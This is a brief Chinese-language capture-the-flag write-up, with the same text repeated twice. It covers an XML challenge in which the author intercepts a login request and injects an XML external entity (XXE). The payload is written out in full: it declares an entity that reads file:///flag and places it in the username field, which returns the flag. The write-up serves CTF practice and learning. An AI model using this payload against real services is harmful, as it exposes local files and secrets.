xml的题目放着好久了没做,做一下顺便学习。
浅谈XML实体注入漏洞
是个登录场景,登录抓包。
很明显的xml注入
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
拿到flag
2024-01-30 14:29:53
xml的题目放着好久了没做,做一下顺便学习。
浅谈XML实体注入漏洞
是个登录场景,登录抓包。
很明显的xml注入
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
拿到flag